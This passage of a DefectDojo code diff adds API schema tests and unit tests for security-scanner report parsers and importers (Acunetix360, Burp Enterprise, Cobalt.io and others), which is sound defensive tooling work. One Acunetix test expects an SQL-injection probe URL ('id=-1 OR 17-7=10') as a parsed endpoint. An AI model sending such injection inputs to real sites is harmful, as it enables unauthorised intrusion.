*args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "products" + self.viewset = ProductViewSet + self.model = Product + self.serializer = ProductSerializer + self.field_transformers = { + "name": lambda v: v + "_new" + } + + # fixed + def test_list_endpoint(self): + super().test_list_endpoint() + + # fixed + def test_patch_endpoint(self): + super().test_patch_endpoint() + + # fixed + def test_put_endpoint(self): + super().test_put_endpoint() + + # fixed + def test_retrieve_endpoint(self): + super().test_retrieve_endpoint() + + # fixed + def test_post_endpoint(self): + super().test_post_endpoint() + + +# Test will only work when FEATURE_AUTHENTICATION_V2 is the default +# class ProductMemberTest(BaseClass.SchemaTest): +# def __init__(self, *args, **kwargs): +# super().__init__(*args, **kwargs) +# self.viewname = "product_members" +# self.viewset = ProductMemberViewSet +# self.model = Product_Member +# self.serializer = ProductMemberSerializer + +# @testIsBroken +# def test_post_endpoint(self): +# super().test_post_endpoint() + +# @testIsBroken +# def test_patch_endpoint(self): +# super().test_post_endpoint() + + +# Test will only work when FEATURE_AUTHENTICATION_V2 is the default +# class ProductGroupTest(BaseClass.SchemaTest): +# def __init__(self, *args, **kwargs): +# super().__init__(*args, **kwargs) +# self.viewname = "product_groups" +# self.viewset = ProductGroupViewSet +# self.model = Product_Group +# self.serializer = ProductGroupSerializer + + +class RegulationTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "regulations" + self.viewset = RegulationsViewSet + self.model = Regulation + self.serializer = RegulationSerializer + + +class SonarqubeIssuesTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "sonarqube_issues" + self.viewset = SonarqubeIssueViewSet + self.model = Sonarqube_Issue + self.serializer = SonarqubeIssueSerializer + self.field_transformers = { + "key": lambda v: v + "_new" + } + + +class ProductAPIScanConfigurationTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "product_api_scan_configurations" + self.viewset = ProductAPIScanConfigurationViewSet + self.model = Product_API_Scan_Configuration + self.serializer = ProductAPIScanConfigurationSerializer + + +class SonarqubeTransitionTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "sonarqube_transitions" + self.viewset = SonarqubeIssueTransitionViewSet + self.model = Sonarqube_Issue_Transition + self.serializer = SonarqubeIssueTransitionSerializer + + +class StubFindingTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "stub_findings" + self.viewset = StubFindingsViewSet + self.model = Stub_Finding + self.serializer = StubFindingSerializer + + +class SystemSettingTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "system_settings" + self.viewset = SystemSettingsViewSet + self.model = System_Settings + self.serializer = SystemSettingsSerializer + + +class AppAnalysisTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "technologies" + self.viewset = AppAnalysisViewSet + self.model = App_Analysis + self.serializer = AppAnalysisSerializer + + # fixed + def test_patch_endpoint(self): + super().test_patch_endpoint() + + # fixed + def test_put_endpoint(self): + super().test_put_endpoint() + + # fixed + def test_post_endpoint(self): + super().test_post_endpoint() + + +class TestTypeTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "test_types" + self.viewset = TestTypesViewSet + self.model = Test_Type + self.serializer = TestTypeSerializer + self.field_transformers = { + "name": lambda v: v + "_new" + } + + +class TestsTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "tests" + self.viewset = TestsViewSet + self.model = Test + self.serializer = TestSerializer + + +class ToolConfigurationTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "tool_configurations" + self.viewset = ToolConfigurationsViewSet + self.model = Tool_Configuration + self.serializer = ToolConfigurationSerializer + + +class ToolProductSettingTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "tool_product_settings" + self.viewset = ToolProductSettingsViewSet + self.model = Tool_Product_Settings + self.serializer = ToolProductSettingsSerializer + + +class ToolTypeTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "tool_types" + self.viewset = ToolTypesViewSet + self.model = Tool_Type + self.serializer = ToolTypeSerializer + + +class UserTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "users" + self.viewset = UsersViewSet + self.model = Dojo_User + self.serializer = UserSerializer + self.field_transformers = { + "username": lambda v: v + "_transformed" + } + + +class LanguageTypeTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "language_types" + self.viewset = LanguageTypeViewSet + self.model = Language_Type + self.serializer = LanguageTypeSerializer + + +class LanguageTest(BaseClass.SchemaTest): + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self.viewname = "languages" + self.viewset = LanguageViewSet + self.model = Languages + self.serializer = LanguageSerializer + + def test_post_endpoint(self): + super().test_post_endpoint(extra_data={"language": 2}) diff --git a/unittests/tools/test_acunetix360_parser.py b/unittests/tools/test_acunetix360_parser.py new file mode 100644 index 00000000000..362d53e11ee --- /dev/null +++ b/unittests/tools/test_acunetix360_parser.py @@ -0,0 +1,85 @@ +from ..dojo_test_case import DojoTestCase +from dojo.models import Test +from dojo.tools.acunetix360.parser import Acunetix360Parser + + +class TestAcunetix360Parser(DojoTestCase): + + def test_parse_file_with_one_finding(self): + testfile = open("unittests/scans/acunetix360/acunetix360_one_finding.json") + parser = Acunetix360Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + def test_parse_file_with_multiple_finding(self): + testfile = open("unittests/scans/acunetix360/acunetix360_many_findings.json") + parser = Acunetix360Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(16, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") + + with self.subTest(i=1): + finding = findings[1] + self.assertEqual("Critical", finding.severity) + self.assertEqual(89, finding.cwe) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/artist.php?id=-1%20OR%2017-7=10") + + with self.subTest(i=2): + finding = findings[2] + self.assertEqual("Medium", finding.severity) + self.assertEqual(205, finding.cwe) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com") + + def test_parse_file_with_mulitple_cwe(self): + testfile = open("unittests/scans/acunetix360/acunetix360_multiple_cwe.json") + parser = Acunetix360Parser() + findings = parser.get_findings(testfile, Test()) + self.assertEqual(1, len(findings)) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("Medium", finding.severity) + self.assertEqual(16, finding.cwe) + self.assertIsNotNone(finding.description) + self.assertGreater(len(finding.description), 0) + self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C", finding.cvssv3) + self.assertEqual(1, len(finding.unsaved_endpoints)) + endpoint = finding.unsaved_endpoints[0] + self.assertEqual(str(endpoint), "http://php.testsparker.com/auth/login.php") diff --git a/unittests/tools/test_aws_scout2_parser.py b/unittests/tools/test_aws_scout2_parser.py new file mode 100644 index 00000000000..43095543461 --- /dev/null +++ b/unittests/tools/test_aws_scout2_parser.py @@ -0,0 +1,46 @@ +from ..dojo_test_case import DojoTestCase +from dojo.tools.aws_scout2.parser import AWSScout2Parser +from django.utils import timezone +from dojo.models import Test, Engagement, Product, Product_Type, Test_Type + + +class TestAwsProwlerParser(DojoTestCase): + def setup(self, testfile): + product_type = Product_Type(critical_product=True, key_product=False) + product_type.save() + + test_type = Test_Type(static_tool=True, dynamic_tool=False) + test_type.save() + + product = Product(prod_type=product_type) + product.save() + + engagement = Engagement( + product=product, target_start=timezone.now(), target_end=timezone.now() + ) + engagement.save() + + parser = AWSScout2Parser() + findings = parser.get_findings( + testfile, + Test( + engagement=engagement, + test_type=test_type, + target_start=timezone.now(), + target_end=timezone.now(), + ), + ) + + testfile.close() + + return findings + + def test_parser_with_critical_vuln_has_one_findings(self): + findings = self.setup(open("unittests/scans/aws_scout2/aws_config.js")) + self.assertEqual(21, len(findings)) + self.assertEqual("Global services logging disabled", findings[0].title) + self.assertEqual("Critical", findings[0].severity) + self.assertEqual(1032, findings[0].cwe) + self.assertEqual("Unused security groups", findings[6].title) + self.assertEqual("Medium", findings[6].severity) + self.assertEqual(1032, findings[6].cwe) diff --git a/unittests/tools/test_burp_enterprise_parser.py b/unittests/tools/test_burp_enterprise_parser.py new file mode 100644 index 00000000000..c180ca5ce2a --- /dev/null +++ b/unittests/tools/test_burp_enterprise_parser.py @@ -0,0 +1,41 @@ +from os import path + +from ..dojo_test_case import DojoTestCase +from dojo.models import Test +from dojo.tools.burp_enterprise.parser import BurpEnterpriseParser + + +class TestBurpEnterpriseParser(DojoTestCase): + + def test_burp_enterprise_with_multiple_vulns(self): + with open(path.join(path.dirname(__file__), "../scans/burp_enterprise/many_vulns.html")) as test_file: + parser = BurpEnterpriseParser() + findings = parser.get_findings(test_file, Test()) + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(12, len(findings)) + + with self.subTest(i=0): + finding = findings[0] + self.assertEqual("High", finding.severity) + self.assertTrue(finding.dynamic_finding) + self.assertEqual(942, finding.cwe) + self.assertEqual("Cross-origin resource sharing: arbitrary origin trusted", finding.title) + description = """**Issue detail:** +The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.The application allowed access from the requested origin https://llqvfwgbsdau.com + +""" + self.assertEqual(description, finding.description) + self.assertIn("An HTML5 cross-origin resource sharing (CORS) policy controls", finding.impact) + self.assertIn("(Web Security Academy: Cross-origin resource sharing (CORS))[https://portswigger.net/web-security/cors]", finding.references) + self.assertEqual(1, len(finding.unsaved_endpoints)) + self.assertEqual("example.com", finding.unsaved_endpoints[0].host) + + with self.subTest(i=5): + finding = findings[5] + self.assertEqual("Info", finding.severity) + self.assertTrue(finding.dynamic_finding) + self.assertIsNone(finding.cwe) + self.assertEqual("WAF Detected: redacted", finding.title) + self.assertIn("WAF tech. details : Cloud-based CDN, WAF & DDoS prevention", finding.description) diff --git a/unittests/tools/test_clair_klar_parser.py b/unittests/tools/test_clair_klar_parser.py new file mode 100644 index 00000000000..6ed642a8c92 --- /dev/null +++ b/unittests/tools/test_clair_klar_parser.py @@ -0,0 +1,35 @@ +from ..dojo_test_case import DojoTestCase +from dojo.tools.clair_klar.parser import ClairKlarParser + + +class TestFile(object): + def read(self): + return self.content + + def __init__(self, name, content): + self.name = name + self.content = content + + +class TestClairKlarParser(DojoTestCase): + + def test_parse_no_content_no_findings(self): + my_file_handle = open("unittests/scans/clair-klar/empty.json") + parser = ClairKlarParser() + findings = parser.get_findings(my_file_handle, None) + my_file_handle.close() + self.assertEqual(0, len(findings)) + + def test_high_findings(self): + my_file_handle = open("unittests/scans/clair-klar/high.json") + parser = ClairKlarParser() + findings = parser.get_findings(my_file_handle, None) + my_file_handle.close() + self.assertEqual(6, len(findings)) + + def test_mixed_findings(self): + my_file_handle = open("unittests/scans/clair-klar/mixed.json") + parser = ClairKlarParser() + findings = parser.get_findings(my_file_handle, None) + my_file_handle.close() + self.assertEqual(6, len(findings)) diff --git a/unittests/tools/test_cobalt_api_importer.py b/unittests/tools/test_cobalt_api_importer.py new file mode 100644 index 00000000000..781ab17874a --- /dev/null +++ b/unittests/tools/test_cobalt_api_importer.py @@ -0,0 +1,115 @@ +import json +from ..dojo_test_case import DojoTestCase +from unittest.mock import patch + +from dojo.models import Test, Engagement, Product, Product_API_Scan_Configuration, Tool_Type, Tool_Configuration +from dojo.tools.cobalt_api.importer import CobaltApiImporter + + +class TestCobaltApiImporter(DojoTestCase): + + @classmethod + def setUpTestData(cls): + + cls.tool_type = Tool_Type() + cls.tool_configuration = Tool_Configuration() + cls.tool_configuration.tool_type = cls.tool_type + cls.tool_configuration.authentication_type = 'API' + cls.tool_configuration.api_key = 'API_KEY' + cls.tool_configuration.extras = 'EXTRAS' + + cls.product = Product() + cls.product.name = 'Product' + cls.engagement = Engagement() + cls.engagement.product = cls.product + cls.test = Test() + cls.test.engagement = cls.engagement + + # This API Scan configuration is not connected to a test + cls.api_scan_configuration = Product_API_Scan_Configuration() + cls.api_scan_configuration.product = cls.product + cls.api_scan_configuration.tool_configuration = cls.tool_configuration + + cls.product_2 = Product() + cls.product_2.name = 'Product_2' + cls.engagement_2 = Engagement() + cls.engagement_2.product = cls.product_2 + cls.test_2 = Test() + cls.test_2.engagement = cls.engagement_2 + + # This API Scan Configuration is connected with test_2 + cls.api_scan_configuration_2 = Product_API_Scan_Configuration() + cls.test_2.api_scan_configuration = cls.api_scan_configuration_2 + cls.api_scan_configuration_2.product = cls.product_2 + cls.api_scan_configuration_2.tool_configuration = cls.tool_configuration + cls.api_scan_configuration_2.service_key_1 = 'SERVICE_KEY_1' + + cls.findings = json.dumps({'a': 1, 'b': 2}) + + def test_prepare_client_do_not_match(self): + product_3 = Product() + engagement_3 = Engagement() + engagement_3.product = product_3 + test_3 = Test() + test_3.engagement = engagement_3 + api_scan_configuration_3 = Product_API_Scan_Configuration() + api_scan_configuration_3.product = self.product + test_3.api_scan_configuration = api_scan_configuration_3 + + with self.assertRaisesRegex(Exception, 'API Scan Configuration for Cobalt.io and Product do not match.'): + cobalt_api_importer = CobaltApiImporter() + cobalt_api_importer.prepare_client(test_3) + + @patch('dojo.models.Product_API_Scan_Configuration.objects') + def test_prepare_client_more_than_one_configuration(self, mock_foo): + mock_foo.filter.return_value = mock_foo + mock_foo.count.return_value = 2 + + with self.assertRaisesRegex(Exception, 'More than one Product API Scan Configuration has been configured, but none of them has been chosen.'): + cobalt_api_importer = CobaltApiImporter() + cobalt_api_importer.prepare_client(self.test) + + mock_foo.filter.assert_called_with(product=self.product) + + @patch('dojo.models.Product_API_Scan_Configuration.objects') + def test_prepare_client_no_configuration(self, mock_foo): + mock_foo.filter.return_value = mock_foo + mock_foo.count.return_value = 0 + + with self.assertRaisesRegex(Exception, 'There are no API Scan Configurations for this Product.'): + cobalt_api_importer = CobaltApiImporter() + cobalt_api_importer.prepare_client(self.test) + + mock_foo.filter.assert_called_with(product=self.product) + + @patch('dojo.models.Product_API_Scan_Configuration.objects') + def test_prepare_client_one_product_configuration(self, mock_foo): + mock_foo.filter.return_value = mock_foo + mock_foo.count.return_value = 1 + mock_foo.first.return_value = self.api_scan_configuration + + cobalt_api_importer = CobaltApiImporter() + cobalt_api, api_scan_configuration = cobalt_api_importer.prepare_client(self.test) + + mock_foo.filter.assert_called_with(product=self.product, tool_configuration__tool_type__name='Cobalt.io') + self.assertEqual(api_scan_configuration, self.api_scan_configuration) + self.assertEqual(cobalt_api.api_token, 'API_KEY') + self.assertEqual(cobalt_api.org_token, 'EXTRAS') + + def test_prepare_client_one_test_configuration(self): + cobalt_api_importer = CobaltApiImporter() + cobalt_api, api_scan_configuration = cobalt_api_importer.prepare_client(self.test_2) + + self.assertEqual(api_scan_configuration, self.api_scan_configuration_2) + self.assertEqual(cobalt_api.api_token, 'API_KEY') + self.assertEqual(cobalt_api.org_token, 'EXTRAS') + + @patch('dojo.tools.cobalt_api.importer.CobaltAPI.get_findings') + def test_get_findings(self, mock_foo): + mock_foo.return_value = self.findings + + cobalt_api_importer = CobaltApiImporter() + my_findings = cobalt_api_importer.get_findings(self.test_2) + + mock_foo.assert_called_with('SERVICE_KEY_1') + self.assertEqual(my_findings, self.findings) diff --git a/unittests/tools/test_cobalt_api_parser.py b/unittests/tools/test_cobalt_api_parser.py new file mode 100644 index 00000000000..b59c6d1b10d --- /dev/null +++ b/unittests/tools/test_cobalt_api_parser.py @@ -0,0 +1,299 @@ +import json + +from ..dojo_test_case import DojoTestCase, get_unit_tests_path +from unittest.mock import patch + +from dojo.tools.cobalt_api.parser import CobaltApiParser +from dojo.models import Test, Test_Type + + +class TestCobaltApiParser(DojoTestCase): + + def test_cobalt_api_parser_with_no_vuln_has_no_findings(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_zero_vul.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + self.assertEqual(0, len(findings)) + + def test_cobalt_api_parser_with_many_vuln_has_many_findings(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_many_vul.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(3, len(findings)) + + def test_cobalt_api_parser_with_carried_over_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_carried_over.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("Missing firewall", finding.title) + self.assertEqual("2021-06-03", finding.date) + self.assertEqual("Low", finding.severity) + self.assertIn("A firewall is...", finding.description) + self.assertEqual("Be sure to...", finding.mitigation) + self.assertEqual("Try this...", finding.steps_to_reproduce) + self.assertEqual("2021-06-05", finding.last_status_update) + self.assertEqual("vu_5wXY6bq", finding.unique_id_from_tool) + self.assertTrue(finding.active) + self.assertTrue(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_check_fix_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_check_fix.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("Cross Site Scripting", finding.title) + self.assertEqual("2021-05-11", finding.date) + self.assertEqual("Medium", finding.severity) + self.assertIn("A XSS injection attack...", finding.description) + self.assertEqual("Ensure that...", finding.mitigation) + self.assertEqual("Do this...", finding.steps_to_reproduce) + self.assertEqual("2021-05-12", finding.last_status_update) + self.assertEqual("vu_3wXY4bq", finding.unique_id_from_tool) + self.assertTrue(finding.active) + self.assertTrue(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_invalid_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_invalid.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("SQL Injection", finding.title) + self.assertEqual("2021-01-01", finding.date) + self.assertEqual("Low", finding.severity) + self.assertIn("A SQL injection attack...", finding.description) + self.assertEqual("Ensure this...", finding.mitigation) + self.assertEqual("Do this than that...", finding.steps_to_reproduce) + self.assertEqual("2021-01-02", finding.last_status_update) + self.assertEqual("vu_5wXY6bq", finding.unique_id_from_tool) + self.assertFalse(finding.active) + self.assertTrue(finding.verified) + self.assertTrue(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_need_fix_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_need_fix.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("SQL Injection", finding.title) + self.assertEqual("2021-04-01", finding.date) + self.assertEqual("High", finding.severity) + self.assertIn("A SQL injection attack...", finding.description) + self.assertEqual("Ensure this...", finding.mitigation) + self.assertEqual("Do this than that...", finding.steps_to_reproduce) + self.assertEqual("2021-04-05", finding.last_status_update) + self.assertEqual("vu_2wXY3bq", finding.unique_id_from_tool) + self.assertTrue(finding.active) + self.assertTrue(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_new_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_new.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("SQL Injection", finding.title) + self.assertEqual("2021-01-01", finding.date) + self.assertEqual("Info", finding.severity) + self.assertIn("A SQL injection attack...", finding.description) + self.assertEqual("Ensure this...", finding.mitigation) + self.assertEqual("Do this than that...", finding.steps_to_reproduce) + self.assertEqual("2021-01-01", finding.last_status_update) + self.assertEqual("vu_5wXY6bq", finding.unique_id_from_tool) + self.assertTrue(finding.active) + self.assertFalse(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_out_of_scope_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_out_of_scope.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("SQL Injection", finding.title) + self.assertEqual("2021-01-01", finding.date) + self.assertEqual("Low", finding.severity) + self.assertIn("A SQL injection attack...", finding.description) + self.assertEqual("Ensure this...", finding.mitigation) + self.assertEqual("Do this than that...", finding.steps_to_reproduce) + self.assertEqual("2021-01-02", finding.last_status_update) + self.assertEqual("vu_5wXY6bq", finding.unique_id_from_tool) + self.assertFalse(finding.active) + self.assertTrue(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertTrue(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_triaging_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_triaging.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("SQL Injection", finding.title) + self.assertEqual("2021-01-01", finding.date) + self.assertEqual("Info", finding.severity) + self.assertIn("A SQL injection attack...", finding.description) + self.assertEqual("Ensure this...", finding.mitigation) + self.assertEqual("Do this than that...", finding.steps_to_reproduce) + self.assertEqual("2021-01-02", finding.last_status_update) + self.assertEqual("vu_5wXY6bq", finding.unique_id_from_tool) + self.assertTrue(finding.active) + self.assertFalse(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_valid_fix_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_valid_fix.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("SQL Injection", finding.title) + self.assertEqual("2021-01-01", finding.date) + self.assertEqual("Low", finding.severity) + self.assertIn("A SQL injection attack...", finding.description) + self.assertEqual("Ensure this...", finding.mitigation) + self.assertEqual("Do this than that...", finding.steps_to_reproduce) + self.assertEqual("2021-01-03", finding.last_status_update) + self.assertEqual("vu_5wXY6bq", finding.unique_id_from_tool) + self.assertFalse(finding.active) + self.assertTrue(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertFalse(finding.risk_accepted) + self.assertTrue(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + def test_cobalt_api_parser_with_wont_fix_finding(self): + testfile = open("unittests/scans/cobalt_api/cobalt_api_one_vul_wont_fix.json") + parser = CobaltApiParser() + findings = parser.get_findings(testfile, Test()) + testfile.close() + for finding in findings: + for endpoint in finding.unsaved_endpoints: + endpoint.clean() + self.assertEqual(1, len(findings)) + finding = findings[0] + self.assertEqual("SQL Injection", finding.title) + self.assertEqual("2021-01-01", finding.date) + self.assertEqual("Low", finding.severity) + self.assertIn("A SQL injection attack...", finding.description) + self.assertEqual("Ensure this...", finding.mitigation) + self.assertEqual("Do this than that...", finding.steps_to_reproduce) + self.assertEqual("2021-01-02", finding.last_status_update) + self.assertEqual("vu_5wXY6bq", finding.unique_id_from_tool) + self.assertTrue(finding.active) + self.assertTrue(finding.verified) + self.assertFalse(finding.false_p) + self.assertFalse(finding.duplicate) + self.assertFalse(finding.out_of_scope) + self.assertTrue(finding.risk_accepted) + self.assertFalse(finding.is_mitigated) + self.assertFalse(finding.static_finding) + self.assertTrue(finding.dynamic_finding) + + @patch('dojo.tools.cobalt_api.importer.CobaltApiImporter.get_findings') + def test_cobalt_api_parser_with_api(self, mock): + with open(get_unit_tests_path() + '/scans/cobalt_api/cobalt_api_many_vul.json') as api_findings_file: + api_findings = json.load(api_findings_file) + mock.return_value = api_findings + + test_type = Test_Type() + test_type.name = 'test_type' + test = Test() + test.test_type = test_type + + parser = CobaltApiParser() + findings = parser.get_findings(None, test) + + mock.assert_called_with(test) + self.assertEqual(3, len(findings)) + self.assertEqual(findings[0].title, 'SQL Injection') + self.assertEqual(findings[1].title, 'Cross Site Scripting') + self.assertEqual(findings[2].title, 'Missing firewall') diff --git a/unittests/tools/test_edgescan_importer.py b/unittests/tools/test_edgescan_importer.py new file mode 100644 index 00000000000..c9feed29e9d --- /dev/null +++ b/unittests/tools/test_edgescan_importer.py @@ -0,0 +1,113 @@ +import json +from django.test import TestCase +from unittest.mock import patch + +from dojo.models import Test, Engagement, Product, Product_API_Scan_Configuration, Tool_Type, Tool_Configuration +from dojo.tools.edgescan.importer import EdgescanImporter + + +class TestEdgescanImporter(TestCase): + + @classmethod + def setUpTestData(cls): + + cls.tool_type = Tool_Type() + cls.tool_configuration = Tool_Configuration() + cls.tool_configuration.tool_type = cls.tool_type + cls.tool_configuration.authentication_type = 'API' + cls.tool_configuration.api_key = 'API_KEY' + cls.tool_configuration.extras = '{"extras": "EXTRAS"}' + + cls.product = Product() + cls.product.name = 'Product' + cls.engagement = Engagement() + cls.engagement.product = cls.product + cls.test = Test() + cls.test.engagement = cls.engagement + + # This API Scan configuration is not connected to a test + cls.api_scan_configuration = Product_API_Scan_Configuration() + cls.api_scan_configuration.product = cls.product + cls.api_scan_configuration.tool_configuration = cls.tool_configuration + + cls.product_2 = Product() + cls.product_2.name = 'Product_2' + cls.engagement_2 = Engagement() + cls.engagement_2.product = cls.product_2 + cls.test_2 = Test() + cls.test_2.engagement = cls.engagement_2 + + # This API Scan Configuration is connected with test_2 + cls.api_scan_configuration_2 = 